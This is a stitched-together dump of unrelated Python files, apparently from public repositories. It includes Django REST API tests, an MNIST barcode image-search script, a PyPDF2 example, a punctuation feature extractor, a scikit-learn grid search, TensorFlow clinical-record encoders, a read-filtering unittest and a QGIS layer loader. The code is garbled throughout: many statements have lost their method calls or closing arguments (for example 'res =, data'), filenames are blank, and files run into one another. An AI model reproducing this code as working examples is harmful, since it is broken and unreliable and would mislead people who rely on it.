def test_cannot_create_purchase_wrong_data(self): res =, self.purchase_data) self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST) def test_create_purchase_with_data(self): product = ProductsTbl.objects.create( product_id=10215, name='<NAME>', quantity=105, unit_price=100.00 ) qty = product.quantity res =, self.purchase_data) new_qty = ProductsTbl.objects.get(['product_id']).quantity self.assertEqual(res.status_code, status.HTTP_201_CREATED) self.assertEqual(['product_id'], self.purchase_data['product_id']) self.assertEqual(['purchase_id'], self.purchase_data['purchase_id']) self.assertEqual(['purchased_quantity'], self.purchase_data['purchased_quantity']) self.assertEqual( new_qty, (qty - self.purchase_data['purchased_quantity'])) def test_cannot_update_purchase(self): res = self.client.put(self.purchase_detail_url) self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST) def test_update_purchase(self): data = {'purchased_quantity': 50} qty = self.product.quantity old_qty = self.purchase.purchased_quantity new_qty = data['purchased_quantity'] qty = qty - (new_qty - old_qty) res = self.client.put(self.purchase_detail_url, data) check_qty = ProductsTbl.objects.get( self.assertEqual(res.status_code, status.HTTP_200_OK) self.assertEqual(['purchased_quantity'], data['purchased_quantity']) self.assertEqual(qty, check_qty) def test_cannot_delete_purchase(self): res = self.client.delete( reverse('purchases-detail', kwargs={'pk': 100})) self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND) def test_delete_purchase(self): qty = self.product.quantity purchase_quantity = self.purchase.purchased_quantity res = self.client.delete(self.purchase_detail_url) new_qty = ProductsTbl.objects.get( self.assertEqual(res.status_code, status.HTTP_204_NO_CONTENT) self.assertEqual(new_qty, (qty + purchase_quantity)) class TestRefillView(APITestCase): def setUp(self): self.product = ProductsTbl.objects.create( product_id=10001, name='<NAME>', quantity=100, unit_price=2500 ) self.url = reverse('refill-list') def test_cannot_refill(self): res = self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST) def test_cannot_refill_wrong_data(self): data = { 'product_id':1000, 'refill_count':100, } res =, data) self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND) def test_refill(self): data ={ 'product_id':self.product.product_id, 'refill_count':1000 } quantity = self.product.quantity new_qty = quantity+data['refill_count'] res =,data) check_qty = ProductsTbl.objects.get( self.assertEqual(res.status_code, status.HTTP_200_OK) self.assertEqual(check_qty,new_qty)
import cv2 from PIL import Image import numpy as np import constants import os import math import matplotlib.pyplot as plt import time def hammingDistance(v1, v2): t = 0 for i in range(len(v1)): if v1[i] != v2[i]: t += 1 return t # read thresholds from thresholds.txt and then store them into thresholds list thresholds = [] with open('./thresholds.txt', 'r') as f: threshold = f.readline() while threshold: threshold = threshold.rstrip("\n") thresholds.append(float(threshold)) threshold = f.readline() f.close() # read barcode and image location from barcodes.txt file imageLocations = [] barcodes = [] with open("barcodes.txt", 'r') as f: line = f.readline() while line: line = line.rstrip("\n") line = line.split(",") imageLocation = line.pop() barcode = [] for bit in line: barcode.append(int(bit)) imageLocations.append(imageLocation) barcodes.append(barcode) line = f.readline() f.close() def create_barcode(imagePath): barcode = [] opcv = cv2.imread(imagePath, 0) # read image file as cv2 image # ret2, th2 = cv2.threshold(opcv, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU) # apply threshold it just makes pixel values either black or white img = Image.fromarray(opcv) # create image from thresholded 2d image array barcode = [] degree = constants.MIN_DEGREE while degree < constants.MAX_DEGREE: # loop through MIN_DEGREE to MAX_DEGREE by STEP_DEGREE currentProjectionThreshold = int(degree / constants.STEP_DEGREE) # find the appropriate threshold index rotated_image = img.rotate(degree) # rotate the image image2d = np.array(rotated_image) # get 2d representation of the rotated image for row in image2d: # loop through each row in thresholded image row_sum = 0 # initialize row pixel counter for pixel in row: # loop through each pixel in the row pixel = pixel / 255 # since we have either 0 or 255 as a pixel value divide this number by 255 to get 0 or 1 which is there is pixel or there is not row_sum+=pixel # sum of pixels across a single row # thresholds the sum of the row to 1 or 0 based on calculated threshold if row_sum >= thresholds[currentProjectionThreshold]: barcode.append(1) else: barcode.append(0) degree += constants.STEP_DEGREE return barcode class CalculateAccuracyHitRatio: def __init__(self, barcodes, imageLocations): self.barcodes = barcodes self.imageLocations = imageLocations def calculateAccuracy(self): accuracy = lambda x : x / 100 successCount = 0 for currDigit in range(constants.NUMBER_OF_DIGITS): # loop through 0 to NUMBER_OF_DIGITS-1 directory = r'./MNIST_DS/{}'.format(currDigit) # digit folder path for imageName in os.listdir(directory): # loop thorugh every file in the directory print("Checking image {}".format(os.path.join(directory, imageName))) searchBarcode = create_barcode(os.path.join(directory, imageName)) s, hd, resultImgLoc, resultImgBarcode = self.checkSuccess(searchBarcode, currDigit) print("\tHamming Distance: {}\n\tResult Image: {}".format(hd, resultImgLoc)) # time.sleep(0.5/4) if s: successCount += 1 hitRatio = accuracy(successCount) return hitRatio def checkSuccess(self, searchBarcode, searchDigitGroup): success = False # variable for holding the success information minHMD = (constants.IMAGE_SIZE*constants.NUM_PROJECTIONS)+1 # Minimum Hamming Distance. It is (maxiumum hamming distance + 1) by default minBarcode = None # barcode that corresponds to the minimum hamming distance imageLoc = None # result image location for i, barcode in enumerate(self.barcodes): # loop through every barcode in the barcodes list currentHMD = hammingDistance( barcode, searchBarcode) # check each bit in both barcodes and calculate how many of these not same if currentHMD == 0: # hamming distance 0 means the barcodes are identical which means they are the same image continue # skip elif currentHMD < minHMD: # if the current calculated hamming distance is less than the minimum hamming distance minHMD = currentHMD # then set minimum hamming distance to current calculated hamming distance minBarcode = barcode # set the current barcode as imageLoc = self.imageLocations[i] resultDigitGroup = imageLoc.split("_", 1)[0] if int(resultDigitGroup) == int(searchDigitGroup): success = True return success, minHMD, imageLoc, minBarcode class SearchSimilar: def __init__(self): self.digitSelectMenu() def findSimilar(self, inputBarcode): minHMD = (constants.IMAGE_SIZE*constants.NUM_PROJECTIONS)+1 print(minHMD) minBarcode = None imageLoc = None for i, barcode in enumerate(barcodes): print(imageLocations[i]) currentHMD = hammingDistance( barcode, inputBarcode) print(currentHMD) if currentHMD == 0: continue elif currentHMD < minHMD: minHMD = currentHMD minBarcode = barcode imageLoc = imageLocations[i] return minHMD, minBarcode, imageLoc def digitSelectMenu(self): digitFolder = int(input("enter a digit (0 - 9): ")) while digitFolder >= 0 and digitFolder <= 9: directory = r'.\MNIST_DS\{}'.format(digitFolder) for c, imageName in enumerate(os.listdir(directory)): print(c , " - ", imageName) selectImage = int(input("select image from above list: ")) selectedImagePath = os.path.join(directory, os.listdir(directory)[selectImage]) print(selectedImagePath) selectedImageBarcode = create_barcode(selectedImagePath) minHMD = (constants.IMAGE_SIZE*constants.NUM_PROJECTIONS)+1 print(minHMD) minBarcode = None imageLoc = None for i, barcode in enumerate(barcodes): print(imageLocations[i]) currentHMD = hammingDistance( barcode,selectedImageBarcode) print(currentHMD) if currentHMD == 0: continue elif currentHMD < minHMD: minHMD = currentHMD minBarcode = barcode imageLoc = imageLocations[i] print("Result:") print("\tHD: {}".format(minHMD)) print("\tImage Location: {}".format(imageLoc)) print("\tBarcode: {}".format(minBarcode)) fig = plt.figure(figsize=(10, 7)) fig.suptitle("Hamming Distance: {}".format(minHMD)) rows, columns = 2, 2 selectedImage = cv2.imread(selectedImagePath) resultImageRelativePath = imageLoc.split("_", 1) resultImagePath = os.path.join(r".\MNIST_DS", r"{}\{}".format(resultImageRelativePath[0], resultImageRelativePath[1])) resultImage = cv2.imread(resultImagePath) from create_barcode_image import BarcodeImageGenerator as big big.generate_barcode_image(selectedImageBarcode, r".\temp\searchImage.png") big.generate_barcode_image(minBarcode, r".\temp\resultImage.png") searchBarcodeImage = cv2.imread(r".\temp\searchImage.png") resultBarcodeImage = cv2.imread(r".\temp\resultImage.png") fig.add_subplot(rows, columns, 1) plt.imshow(selectedImage) plt.axis("off") plt.title("Search Image") fig.add_subplot(rows, columns, 2) plt.imshow(resultImage) plt.axis("off") plt.title("Result Image") fig.add_subplot(rows, columns, 3) plt.imshow(searchBarcodeImage) plt.axis("off") plt.title("Search Barcode") fig.add_subplot(rows, columns, 4) plt.imshow(resultBarcodeImage) plt.axis("off") plt.title("Result Barcode") digitFolder = int(input("enter a digit (0 - 9): ")) def showAllResults(self): fig = plt.figure(figsize=(16,100), dpi=100) rows, cols = constants.NUMBER_OF_DIGITS*constants.NUMBER_IMAGES, 2 for currDigit in range(constants.NUMBER_OF_DIGITS): # loop through 0 to NUMBER_OF_DIGITS-1 directory = r'./MNIST_DS/{}'.format(currDigit) # digit folder path for i, imageName in zip((i for i in range(1, 20, 2)), os.listdir(directory)): # loop thorugh every file in the directory selectedImagePath = os.path.join(directory, imageName) print("Checking image {}".format(os.path.join(directory, imageName))) searchBarcode = create_barcode(os.path.join(directory, imageName)) hmd, resultBarcode, resultImgLoc = self.findSimilar(searchBarcode) selectedImage = cv2.imread(selectedImagePath) resultImageRelativePath = resultImgLoc.split("_", 1) resultImagePath = os.path.join(r".\MNIST_DS", r"{}\{}".format(resultImageRelativePath[0], resultImageRelativePath[1])) resultImage = cv2.imread(resultImagePath) sii = currDigit*20+i fig.add_subplot(rows, cols, sii) plt.imshow(selectedImage) plt.axis("off") plt.title(selectedImagePath, fontsize=9, y=0.90) fig.add_subplot(rows, cols, sii+1) plt.imshow(resultImage) plt.axis("off") plt.title(resultImagePath, fontsize=9, y=0.90) return fig import matplotlib # Make sure that we are using QT5 matplotlib.use('Qt5Agg') import matplotlib.pyplot as plt from PyQt5 import QtWidgets from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar class ScrollableWindow(QtWidgets.QMainWindow): def __init__(self, fig): self.qapp = QtWidgets.QApplication([]) QtWidgets.QMainWindow.__init__(self) self.widget = QtWidgets.QWidget() self.setCentralWidget(self.widget) self.widget.setLayout(QtWidgets.QVBoxLayout()) self.widget.layout().setContentsMargins(0,0,0,0) self.widget.layout().setSpacing(0) self.fig = fig self.canvas = FigureCanvas(self.fig) self.canvas.draw() self.scroll = QtWidgets.QScrollArea(self.widget) self.scroll.setWidget(self.canvas) self.nav = NavigationToolbar(self.canvas, self.widget) self.widget.layout().addWidget(self.nav) self.widget.layout().addWidget(self.scroll) exit(self.qapp.exec_()) if __name__ == "__main__": print("Search Menu") print("Calculate Accuracy Hit Ratio") print("Show All Results at Once") input("Yes I have read the above notes. Press Enter to continue...") print("\n\n\nEnter a number between 0 and 9 to search image") print("Enter a number smaller than 0 or greater than 9 to exit the search menu") print("Once you exit Search Menu you will get Calculate Accuracy Hit Ratio ") input("Yes I have read the above notes. Press Enter to continue...") si = SearchSimilar() # search menu print("\n\n\nCalculating accuracy hit ratio...") cahr = CalculateAccuracyHitRatio(barcodes, imageLocations) # accuracy calculator print("Accuracy is {}".format(cahr.calculateAccuracy())) # calculate and display the accuracy input("Yes I have read the above notes. Press Enter to DISPLAY ALL THE RESULTS at Once...") print("\n\n\nSearching all the images in the dataset and finding results...") print("Once you get the window maximize the window and scrolldown to see the results") input("Yes I have read the above notes. Press Enter to continue...") fig = si.showAllResults() a = ScrollableWindow(fig)
<filename>file-operations/ # Use PyPDF2 library to work with pdf files # It can only read text content, not the images and other media content import PyPDF2 # read as binary file, make sure you pass the pdf file name pdf_file = open("path-to-pdf.pdf", "rb") pdf_reader = PyPDF2.PdfFileReader(pdf_file) print("Number of pages in the pdf file:", pdf_reader.numPages) # 0 based index grab_a_page = pdf_reader.getPage(10) print("Content of a given page is:", grab_a_page.extractText()) # # It allows to append an page to end but hard to add content to any page # pdf_writer = PyPDF2.PdfFileWriter() # pdf_writer.addPage(grab_a_page) # Write the page 101 to a new file, it creates a new file # output_file = open("new_pdf_file.pdf", "wb") # pdf_writer.write(output_file) pdf_file.close() # output_file.close()
# Written by <NAME> import os def file_feature_extraction(dir, filename): ''' Navigates through tokenized words, reconstructs original form by following few rules Then, extracts features for that token and adds them to the corresponding list All features of the dataset is written in the same txt file. Args: dir: directory of the given file filename: name of the input file Returns: ''' punc = '\',.\"?!-;:()' # % left out for now quote_count = 0 x = [] # features y = [] # labels tokens = [] with open(dir+filename, 'r', encoding='utf8') as f: for line in f.readlines(): # each token is kept on a different line tokens.append(line.rstrip('\n')) for token, i in zip(tokens, range(len(tokens))): found = False if token in punc: # for only punctuation tokens if (token == '\'' or token == '\"') and quote_count % 2 == 0: quote_count += 1 punc_type = punc.index(token) try: original_form = token + tokens[i + 1] #add try statements label = 1 # punctuation is another token pos = 0 found = True except IndexError: break # send for feature extraction elif (token == '\'' or token == '\"') and quote_count % 2 == 1: quote_count += 1 punc_type = punc.index(token) original_form = tokens[i - 1] + token label = 1 # punctuation is another token pos = len(original_form) - 1 found = True # send for feature extraction elif token == '.' or token == ',' or token == '?' or token == '!' or token == ';' or token == ':': punc_type = punc.index(token) original_form = tokens[i - 1] + token label = 1 pos = len(original_form) - 1 found = True #send for feature extraction elif token == '(': punc_type = punc.index(token) try: original_form = token + tokens[i + 1] label = 1 pos = 0 found = True except IndexError: break elif token == ')': punc_type = punc.index(token) original_form = tokens[i - 1] + token label = 1 pos = 0 found = True else: # for not only punctuation tokens if token == '...': punc_type = punc.index(token[0]) original_form = tokens[i - 1] + token label = 1 pos = len(original_form) - 1 found = True else: for ch, j in zip(token, range(len(token))): # iterate through string to detect punctuations punc_type = punc.find(ch) if punc_type != -1: # punctuation is found pos = j original_form = token label = 0 found = True break if found: only_punc = True for j in original_form: if j not in punc: case = int(j.isupper()) only_punc = False break if not only_punc: x.append([punc_type, pos, len(original_form), case]) y.append(label) return x, y def token_feature_extraction(token): ''' Args: token: token whose features are going to be extracted Returns: features for the token used during inference ''' x = None punc = '\',.\"?!-;:()' # % left out for now for ch, j in zip(token, range(len(token))): # iterate through string to detect punctuations punc_type = punc.find(ch) if punc_type != -1: # punctuation is found pos = j original_form = token break only_punc = True for j in original_form: if j not in punc: case = int(j.isupper()) only_punc = False break if not only_punc: x = [punc_type, pos, len(original_form), case] return x if __name__ == '__main__': x = [] y = [] dir = 'D:/Mansur/Boun/CMPE 561/assignments/assignment 1/42bin_haber/news/' categories = os.listdir(dir) for i in categories: category_dir = dir + i + '/' category_files = os.listdir(category_dir) for j in category_files: if '_tokenized' in j: # take only tokenized files x_temp, y_temp = file_feature_extraction(category_dir, j) x.extend(x_temp) y.extend(y_temp) with open('../features/tokenization_features_and_labels.txt', 'r+', encoding='utf8') as f: for feature, i in zip(x, range(len(x))): for j in feature: f.write('%d\t' % j) f.write('%d\n' % y[i])
<filename>python/tools/ import sys, os, shutil, subprocess # def storeSourcePath(installdir, simfemsourcedir): # with open(installdir+'/SOURCE_DIR_SIMFEM','w') as pathfile: # pathfile.write(simfemsourcedir) # def getSourcePath(installdir): # with open(installdir+'/SOURCE_DIR_SIMFEM','r') as pathfile: # return
<gh_stars>0 from sklearn.model_selection import GridSearchCV from sklearn.pipeline import Pipeline from .base_search import BaseSearchALS _KWARG_TRANSFORM = 'transform_y' class GridSearchALS(BaseSearchALS): def fit(self, *args, **kwargs): x_df, y_df, cols = args transform_y = kwargs.get(_KWARG_TRANSFORM, None) cv = self._make_cv(cols) scorer = self._make_scorer(transform_y=transform_y) gs = GridSearchCV(Pipeline(self.pipe), self.hyperparameters, cv=cv, scoring=scorer, return_train_score=self.with_train_score, n_jobs=self.n_jobs, verbose=self.verbose), y=y_df) return gs
""" Clinical snapshot encoders for use with CANTRIP Model. CANTRIPModel expects a clinical snapshot encoder function which takes as input the CANTRIPModel and adds clinical snapshot encoding ops to the graph returning the final clinical snapshot encoding as [batch x max_seq_len x embedding_size] """ import tensorflow.compat.v1 as tf import layers import rnn_cell def rnn_encoder(num_hidden, cell_fn=rnn_cell.RANCell): """ Creates an RNN encoder with the given number of hidden layers. If :param num_hidden: number of hidden (memory) units use; num_hidden is iterable, a multi-layer rnn cell will be creating using each number of hidden units :param cell_fn: rnn_cell constructor to use :return: rnn_encoder function """ def _rnn_encoder(model): """ :type model: modeling.BERTModel """ with tf.variable_scope('rnn_encoder'): # Embed clinical observations embedded_observations = layers.embedding_layer(model.observations, model.vocabulary_size, model.embedding_size, model.vocab_dropout, # Reshape to (batch * seq_len) x doc_len x embedding flattened_embedded_obs = tf.reshape(embedded_observations, [model.batch_size * model.max_seq_len, model.max_snapshot_size, model.embedding_size], name='flat_emb_obs') flattened_snapshot_sizes = tf.reshape(model.snapshot_sizes, [model.batch_size * model.max_seq_len], name='flat_snapshot_sizes') # Apply RNN to all documents in all batches flattened_snapshot_encodings = layers.rnn_layer(cell_fn=cell_fn, num_hidden=num_hidden, inputs=flattened_embedded_obs, lengths=flattened_snapshot_sizes, return_interpretable_weights=False) # Reshape back to (batch x seq_len x encoding_size) return tf.reshape(flattened_snapshot_encodings, [model.batch_size, model.max_seq_len, flattened_snapshot_encodings.shape[-1]], name='rnn_snapshot_encoding') return _rnn_encoder def cnn_encoder(windows=None, kernels=1000, dropout=0.): """ Creates a CNN encoder with the given number of windows, kernels, and dropout :param windows: number of consecutive observations to consider; defaults to [3, 4, 5] :param kernels: number of convolutional kernels; defaults to 1,000 :param dropout: dropout probability; defaults to 0.0 (no dropout) :return: cnn_encoder function """ if windows is None: windows = [3, 4, 5] def _cnn_encoder(model): """ :type model: BERTModel """ with tf.variable_scope('cnn_encoder'): # Embed observations embedded_observations = layers.embedding_layer(model.observations, model.vocabulary_size, model.embedding_size, model.vocab_dropout, # Reshape to (batch * seq_len) x snapshot_size x embedding flattened_embedded_obs = tf.reshape(embedded_observations, [model.batch_size * model.max_seq_len, model.max_snapshot_size, model.embedding_size]) # Apply parallel convolutional and pooling layers outputs = [] for n in windows: if dropout > 0: flattened_embedded_obs = \ tf.keras.layers.Dropout(rate=model.dropout)(flattened_embedded_obs, conv_layer = tf.keras.layers.Convolution1D(filters=kernels, kernel_size=n, activation=tf.nn.leaky_relu, name="conv_%dgram" % n)(flattened_embedded_obs) pool_layer = tf.keras.layers.MaxPooling1D(pool_size=1, strides=model.max_snapshot_size - n + 1, name="maxpool_%dgram" % n)(conv_layer) outputs.append(pool_layer) # Concatenate pooled outputs output = tf.concat(outputs, axis=-1) # Embed concat output with leaky ReLU embeddings = tf.keras.layers.Dense(units=model.embedding_size, activation=tf.nn.relu)(output) # Reshape back to [batch_size x max_seq_len x encoding_size] return tf.reshape(embeddings, [model.batch_size, model.max_seq_len, model.embedding_size]) return _cnn_encoder def get_bag_vectors(model): """ Represents snapshots as a bag of clinical observations. Specifically, returns a V-length binary vector such that the v-th index is 1 iff the v-th observation occurs in the given snapshot :param model: CANTRIP model :type model: modeling.CANTRIPModel :return: clinical snapshot encoding """ # 1. Evaluate which entries in model.observations are non-zero mask = tf.not_equal(model.observations, 0) where = tf.where(mask) # 2. Get the vocabulary indices for non-zero observations vocab_indices = tf.boolean_mask(model.observations, mask) vocab_indices = tf.expand_dims(vocab_indices[:], axis=-1) vocab_indices = tf.cast(vocab_indices, dtype=tf.int64) # 3. Get batch and sequence indices for non-zero observations tensor_indices = where[:, :-1] # Concat batch, sequence, and vocabulary indices indices = tf.concat([tensor_indices, vocab_indices], axis=-1) # Our sparse tensor will be 1 for observed observations, 0, otherwise ones = tf.ones_like(indices[:, 0], dtype=tf.float32) # The dense shape will be the same as model.observations, but using the entire vocabulary as the final dimension dense_shape = model.observations.get_shape().as_list() dense_shape[2] = model.vocabulary_size # Store as a sparse tensor because they're neat st = tf.SparseTensor(indices=indices, values=ones, dense_shape=dense_shape) return tf.sparse.reorder(st) def dense_encoder(model): """ Represents documents as an embedded bag of clinical observations. Specifically, returns an embedded of the V-length binary vector encoding all clinical observations included in a snapshot :param model: CANTRIP model :type model: modeling.CANTRIPModel :return: clinical snapshot encoding """ with tf.variable_scope('dense_encoder'): # Use the CPU cause things are about to weird (i.e., too big to fit in GPU memory) with tf.device("/cpu:0"): # Add bag-of-observation vector transformations to the model bags = get_bag_vectors(model) # Embed bag-of-observation vectors embedded_observations = layers.create_embeddings(model.vocabulary_size, model.embedding_size, model.vocab_dropout, # Reshape them so we use the same projection weights for every bag flat_emb_bags = tf.sparse.reshape(bags, [model.batch_size * model.max_seq_len, model.vocabulary_size], name='flat_emb_obs') # Dropout for fun # if model.dropout > 0: # flat_emb_bags = tf.layers.dropout(flat_emb_bags, rate=model.dropout, # Sparse to dense projection flat_doc_embeddings = tf.sparse_tensor_dense_matmul(flat_emb_bags, embedded_observations, name='flat_doc_embeddings') # More dropout for fun flat_doc_embeddings = tf.keras.layers.Dropout(rate=model.dropout)(flat_doc_embeddings, # Reshape back to [batch_size x max_seq_len x encoding_size] return tf.reshape(flat_doc_embeddings, [model.batch_size, model.max_seq_len, model.embedding_size], name='doc_embeddings') def bag_encoder(model): """ Represents snapshots as a bag of clinical observations. Specifically, returns a V-length binary vector such that the v-th index is 1 iff the v-th observation occurs in the given snapshot :param model: CANTRIP model :type model: modeling.CANTRIPModel :return: clinical snapshot encoding """ with tf.variable_scope('bow_encoder'): # Use the CPU cause everything will be vocabulary-length with tf.device("/cpu:0"): return tf.sparse.to_dense(get_bag_vectors(model)) class SparseDenseLayer(tf.keras.layers.Dense): def __init__(self, units, activation=None, use_bias=True, kernel_initializer='glorot_uniform', bias_initializer='zeros', kernel_regularizer=None, bias_regularizer=None, activity_regularizer=None, kernel_constraint=None, bias_constraint=None, **kwargs): super(SparseDenseLayer, self).__init__(units=units, activation=activation, use_bias=use_bias, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, kernel_regularizer=kernel_regularizer, bias_regularizer=bias_regularizer, activity_regularizer=activity_regularizer, kernel_constraint=kernel_constraint, bias_constraint=bias_constraint, **kwargs) def call(self, inputs): if not isinstance(inputs, tf.SparseTensor): return super(SparseDenseLayer, self).call(inputs) outputs = tf.sparse.sparse_dense_matmul(inputs, self.kernel) outputs = tf.debugging.check_numerics(outputs, "SparseDenseLayer had NaN product") if self.use_bias: outputs = tf.nn.bias_add(outputs, self.bias) outputs = tf.debugging.check_numerics(outputs, "SparseDenseLayer had NaN bias sum") if self.activation is not None: outputs = self.activation(outputs) outputs = tf.debugging.check_numerics(outputs, "SparseDenseLayer had NaN activation") outputs = tf.debugging.check_numerics(outputs, "SparseDenseLayer output had NaNs") return outputs def dan_encoder(obs_hidden_units, avg_hidden_units, activation='gelu'): """Represents snapshots as a modified element-wise averages of embedded clinical observations. :param obs_hidden_units: number of hidden units in dense layers between observation embeddings and average; if iterable multiple dense layers will be added using the respective hidden units :param avg_hidden_units: number of hidden units in dense layers between average embeddings and snapshot encoding; if iterable multiple dense layers will be added using the respective hidden units :param activation: type of activation function to use between layers :return: clinical snapshot encoding """ activation_fn = None if activation == 'gelu': activation_fn = layers.gelu elif activation == 'relu': activation_fn = tf.nn.relu elif activation == 'tanh': activation_fn = tf.nn.tanh elif activation == 'sigmoid': activation_fn = tf.nn.sigmoid else: raise KeyError('Unsupported activation function: %s' % activation) def _dan_encoder(model): """ :param model: :type model: modeling.CANTRIPModel :return: """ with tf.variable_scope('dan_encoder'): embedded_observations = layers.embedding_layer(model.observations, model.vocabulary_size, model.embedding_size, model.vocab_dropout, # Reshape to (batch * seq_len * doc_len) x embedding flattened_embedded_observations = tf.reshape( embedded_observations, [model.batch_size * model.max_seq_len * model.max_snapshot_size, model.embedding_size] ) # Add dense observation layers obs_layer = flattened_embedded_observations for num_hidden in obs_hidden_units: obs_layer = tf.keras.layers.Dense(units=num_hidden, activation=activation_fn)(obs_layer) # Reshape final output by grouping observations in the same snapshot together obs_layer = tf.reshape(obs_layer, [model.batch_size * model.max_seq_len, model.max_snapshot_size, obs_hidden_units[-1]]) # Divide by active number of observations rather than the padded snapshot size; requires reshaping to # (batch x seq_len) x 1 so we can divide by this flattened_snapshot_sizes = tf.reshape(model.snapshot_sizes, [model.batch_size * model.max_seq_len, 1]) mask = tf.sequence_mask(model.snapshot_sizes, maxlen=model.max_snapshot_size, dtype=tf.float32) mask = tf.reshape(mask, [model.batch_size * model.max_seq_len, model.max_snapshot_size, 1]) # Compute dynamic-size element-wise average avg_layer = tf.reduce_sum(obs_layer * mask, axis=1) avg_layer = avg_layer / tf.cast(tf.maximum(flattened_snapshot_sizes, 1), dtype=tf.float32) # More fun dense layers for num_hidden in avg_hidden_units: avg_layer = tf.keras.layers.Dense(num_hidden, activation_fn)(avg_layer) # Final output of the model output = tf.keras.layers.Dense(model.embedding_size, activation_fn)(avg_layer) # Reshape to [batch_size x seq_len x encoding_size] return tf.reshape(output, [model.batch_size, model.max_seq_len, model.embedding_size]) return _dan_encoder def rmlp_encoder(activation='gelu', num_layers=10, num_hidden=2048): activation_fn = None if activation == 'gelu': activation_fn = layers.gelu elif activation == 'relu': activation_fn = tf.nn.relu elif activation == 'tanh': activation_fn = tf.nn.tanh elif activation == 'sigmoid': activation_fn = tf.nn.sigmoid else: raise KeyError('Unsupported activation function: %s' % activation) def residual_unit(inputs, i, units): with tf.variable_scope("residual_unit%d" % i): x = tf.keras.layers.Dense(units=units, activation=activation_fn)(inputs) x = tf.keras.layers.BatchNormalization()(x) x = activation_fn(x) return x + inputs def _rmlp_encoder(model): # Convert batch x seq_len x doc_len tensor of obs IDs to batch x seq_len x vocab_size bag-of-observation vectors with tf.variable_scope("RMLP"): bags = get_bag_vectors(model) flat_bags = tf.sparse.reshape(bags, [model.batch_size * model.max_seq_len, model.vocabulary_size]) x = SparseDenseLayer(units=num_hidden, activation=None)(flat_bags) # Convert to Dense to debug NaNs # flat_bags = tf.sparse.to_dense(flat_bags) # flat_bags = tf.debugging.assert_all_finite(flat_bags, 'flat bags had nans') # x = tf.keras.layers.Dense(units=num_hidden, activation=None)(flat_bags) for i in range(num_layers): x = residual_unit(x, i, num_hidden) x = tf.keras.layers.Dense(units=model.embedding_size, activation=activation_fn)(x) x = tf.debugging.assert_all_finite(x, 'dense had nans') x = tf.reshape(x, [model.batch_size, model.max_seq_len, model.embedding_size]) x = tf.debugging.assert_all_finite(x, 'reshape had nans') return x return _rmlp_encoder def vhn_encoder(activation='gelu', noise_weight=0.75, num_layers=10, depth=6, num_hidden=2048): activation_fn = None if activation == 'gelu': activation_fn = layers.gelu elif activation == 'relu': activation_fn = tf.nn.relu elif activation == 'tanh': activation_fn = tf.nn.tanh elif activation == 'sigmoid': activation_fn = tf.nn.sigmoid else: raise KeyError('Unsupported activation function: %s' % activation) def vhn_layer(inputs, units, residuals): noise = tf.random.uniform(shape=inputs.shape, dtype=tf.float32) / noise_weight out = tf.keras.layers.Dense(units=units, activation=activation_fn)(inputs + noise) return tf.math.add_n([out, inputs] + residuals) def _vhn_encoder(model): # Convert batch x seq_len x doc_len tensor of obs IDs to batch x seq_len x vocab_size bag-of-observation vectors bags = get_bag_vectors(model) flat_bags = tf.sparse.reshape(bags, [model.batch_size * model.max_seq_len, model.vocabulary_size]) x = SparseDenseLayer(units=num_hidden, activation=None)(flat_bags) residuals = [] for i in range(num_layers): slice_ = min(i + 1, depth) x = vhn_layer(x, units=num_hidden, residuals=residuals[-slice_:]) residuals.append(x) x = tf.keras.layers.Dense(units=model.embedding_size, activation=activation_fn)(x) x = tf.reshape(x, [model.batch_size, model.max_seq_len, model.embedding_size]) return x return _vhn_encoder
import gzip import unittest import subprocess import os class TestPreProcessing(unittest.TestCase): def setUp(self): # params for the test self.curr_path = os.path.dirname(os.path.abspath(__file__)) self.output_path = self.curr_path + "/data" self.file_one = self.output_path + "/all_reads_R1.fq" self.file_two = self.output_path + "/all_reads_R2.fq" self.database_path = self.curr_path self.db_one_name = "human-GCA-phix-db" self.db_two_name = "human-GRC-db" self.db_three_name = "kraken2-human-db" pass def test_command(self): """Test command completes.""" # run command res_cmnd =["./", self.file_one, self.file_two, self.database_path, self.db_one_name, self.db_two_name, self.db_three_name, self.output_path]) self.assertTrue(res_cmnd.returncode == 0) def test_filter_results(self): """Test command results match expectation.""" # base truth with open(self.output_path + '/host_read_ids.txt') as file: exp_lines = [line.replace('\n','') for line in file.readlines()] # check file size (should be much greater than 100 bytes) out_size = os.path.getsize(self.output_path + '/test_res_R1.trimmed.fastq.gz') self.assertTrue(out_size > 100) # results with + '/test_res_R1.trimmed.fastq.gz','r') as fin: res_lines = [line.decode("utf-8").replace('\n','') for line in fin if '@' in str(line)] # check there are no host reads passing filter rel_tol = len(set(res_lines) & set(exp_lines)) / len(set(exp_lines)) * 100 self.assertTrue(rel_tol < 0.1) # finally remove files os.remove(self.curr_path + "/fastp.html") os.remove(self.curr_path + "/fastp.json") os.remove(self.output_path + "/test_res_R1.trimmed.fastq.gz") os.remove(self.output_path + "/test_res_R2.trimmed.fastq.gz") if __name__ == "__main__": unittest.main()
<filename>tonggong/validations/ from . import errors, utils, validators __all__ = ["validators", "errors", "utils"]
<filename>openeo-qgis-plugin-master/models/<gh_stars>0 from qgis.core import QgsRasterLayer from qgis.PyQt.QtCore import QFileInfo from qgis.core import QgsProject class Result(): def __init__(self, path=None): self.path = path def display(self): """ Displays an image from the given path on a new created QGIS Layer. """ # Check if string is provided if self.path: fileInfo = QFileInfo(self.path) path = fileInfo.filePath() baseName = fileInfo.baseName() layer = QgsRasterLayer(path, baseName) QgsProject.instance().addMapLayer(layer) if layer.isValid() is True: print "Layer was loaded successfully!" else: print "Unable to read basename and file path - Your string is probably invalid"
